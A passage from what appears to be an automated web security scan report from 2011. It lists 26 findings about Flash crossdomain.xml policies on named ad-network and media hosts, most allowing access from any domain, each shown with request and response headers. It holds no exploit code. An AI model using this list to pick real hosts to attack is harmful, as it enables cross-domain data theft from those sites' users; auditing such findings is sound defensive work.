5.104. http://shadow01.yumenetworks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shadow01.yumenetworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: shadow01.yumenetworks.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:46:33 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Last-Modified: Fri, 12 Mar 2010 23:37:01 GMT
ETag: "12a8464-122-481a3020e8140"
Accept-Ranges: bytes
Content-Length: 290
P3P: policyref="http://qa-web-001.sjc1.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Access-Control-Allow-Origin: *
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allo
...[SNIP]...
5.105. http://spe.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Thu, 22 Sep 2011 14:59:07 GMT
Date: Sat, 17 Sep 2011 16:39:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
5.106. http://studio-5.financialcontent.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: studio-5.financialcontent.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:16 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 17 Sep 2011 16:23:16 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...
5.107. http://t.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 16:24:45 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
5.108. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 16:38:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "6803d3-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...
5.109. http://tcr.tynt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Sat, 17 Sep 2011 16:27:03 GMT
ETag: "251523935"
Expires: Sat, 17 Sep 2011 16:57:03 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: EOS (lax001/54D6)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
5.110. http://um.simpli.fi/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: um.simpli.fi

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 16:30:28 GMT
Content-Type: text/xml
Content-Length: 102
Last-Modified: Thu, 24 Feb 2011 21:07:44 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.111. http://video.od.visiblemeasures.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.od.visiblemeasures.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: video.od.visiblemeasures.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 16:30:16 GMT
Content-Type: text/xml
Content-Length: 169
Last-Modified: Thu, 24 Feb 2011 08:23:29 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>
5.112. http://vms.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vms.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vms.msn.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 06 Oct 2009 22:14:14 GMT
Accept-Ranges: bytes
ETag: "0bf6456d246ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:30:26 GMT
Connection: keep-alive
Content-Length: 205

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
5.113. http://widget.newsinc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: widget.newsinc.com

Response

HTTP/1.1 200 OK
x-amz-id-2: q02txhWIcnhAGraWBeefr27rcwGbzoRRONdoC6cV8G8FNXweLAvtApusk+146/CA
x-amz-request-id: E031A467F2F35EF5
Date: Sat, 17 Sep 2011 16:23:08 GMT
Last-Modified: Mon, 26 Oct 2009 18:54:37 GMT
ETag: "9a2df4412dfbe178fccafc4915ad186e"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 335
Connection: keep-alive
Server: AmazonS3

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-polici
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
5.114. http://www.burstnet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.burstnet.com

Response

HTTP/1.0 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Last-Modified: Tue, 30 Aug 2011 17:48:00 GMT
ETag: "596a1b-66-4e5d2250"
Accept-Ranges: bytes
Content-Length: 102
Content-Type: text/xml
Date: Sat, 17 Sep 2011 16:43:42 GMT
Connection: close
Set-Cookie: 56Q8=0; expires=Wed, 22-Aug-2001 17:30:00 GMT; path=/; domain=.www.burstnet.com

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.115. http://www.casalemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.casalemedia.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:49 GMT
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:37:20 GMT
ETag: "430003-e6-4e3c9c00"
Accept-Ranges: bytes
Content-Length: 230
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...
5.116. http://www.kaboodle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboodle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kaboodle.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"200-1315340584000"
Last-Modified: Tue, 06 Sep 2011 20:23:04 GMT
Content-Type: application/xml
Content-Length: 200
Date: Sat, 17 Sep 2011 16:30:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.117. http://www.nexac.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nexac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nexac.com

Response

HTTP/1.0 200 OK
Connection: close
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "3835246478"
Last-Modified: Fri, 22 Jul 2011 16:11:25 GMT
Content-Length: 201
Date: Sat, 17 Sep 2011 16:44:23 GMT
Server: lighttpd/1.4.18

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
5.118. http://www.zvents.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zvents.com

Response

HTTP/1.0 200 OK
Server: nginx/0.6.39
Date: Fri, 16 Sep 2011 23:42:02 GMT
Content-Type: text/xml
Last-Modified: Thu, 26 May 2011 23:14:54 GMT
Expires: Sat, 17 Sep 2011 23:42:02 GMT
Cache-Control: max-age=86400
Age: 60070
X-Cache: HIT from squid1.admin.zvents.com
X-Cache-Lookup: HIT from squid1.admin.zvents.com:3128
Via: 1.0 squid1.admin.zvents.com (squid/3.1.4)
Proxy-Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
5.119. http://www2.glam.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.glam.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www2.glam.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 16 Sep 2010 21:08:11 GMT
ETag: "3d38003-cc-49066d7f404c0"
Accept-Ranges: bytes
Content-Length: 204
Content-Type: text/xml
Date: Sat, 17 Sep 2011 16:45:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
5.120. http://y.timesunion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://y.timesunion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: y.timesunion.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:23 GMT
Server: Omniture DC/2.0.0
xserver: www423
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
5.121. http://ad.wsod.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 16:45:01 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "377fa7-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...
5.122. http://ads.adbrite.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Sat, 17 Sep 2011 16:33:10 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...
5.123. http://as.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://as.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: as.serving-sys.com

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 116
Content-Type: text/xml
Last-Modified: Wed, 25 Jun 2008 14:19:50 GMT
Accept-Ranges: bytes
ETag: "94b48487ced6c81:74654"
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE8

<cross-domain-policy>
<allow-access-from domain="*.serving-sys.com" secure="false" />
</cross-domain-policy>

5.124. http://cim.meebo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cim.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cim.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 16:34:34 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Tue, 09 Aug 2011 21:34:10 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...
5.125. http://cm.npc-hearst.overture.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cm.npc-hearst.overture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cm.npc-hearst.overture.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:04 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 639
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...
5.126. http://extras.seattlepi.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://extras.seattlepi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: extras.seattlepi.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:24:11 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 11 Apr 2011 21:18:53 GMT
ETag: "57e6d-a5-4a0ab1f5ec940"
Accept-Ranges: bytes
Content-Length: 165
Content-Type: text/xml
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.seattlepi.com" />
</cross-domain-policy>
5.127. http://fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: fetchback.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:18:27 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 30 Apr 2010 21:39:42 GMT
Accept-Ranges: bytes
Content-Length: 328
Cache-Control: max-age=0
Expires: Sat, 17 Sep 2011 17:18:27 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- Begin FetchBack Cross Domain Policy Entry -->
<allow-access-from domain="*.fetchback.com" to-ports="80" />
...[SNIP]...
5.128. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 15 Sep 2011 22:33:08 GMT
Date: Sat, 17 Sep 2011 04:47:56 GMT
Expires: Sun, 18 Sep 2011 04:47:56 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 42499
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
5.129. http://login.dotomi.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
